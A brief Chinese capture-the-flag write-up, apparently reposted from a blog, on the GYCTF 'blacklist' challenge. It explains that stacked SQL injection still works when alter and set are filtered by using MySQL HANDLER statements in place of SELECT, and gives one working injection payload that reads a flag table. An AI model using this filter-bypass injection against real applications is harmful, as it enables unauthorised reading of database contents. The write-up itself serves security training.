GYCTFblacklist[堆叠注入 ]

考点:堆叠注入 handler语句代替select查询

类似于强网杯随便注

不同是过滤了alter,set等函数,不能通过改变列命或着sql预处理查询表内数据

 可以使用handler语句代替select查询

payload:

1';handler FlagHere open;handler FlagHere read first;

猜你喜欢

转载自www.cnblogs.com/tiaopidejun/p/12357080.html
今日推荐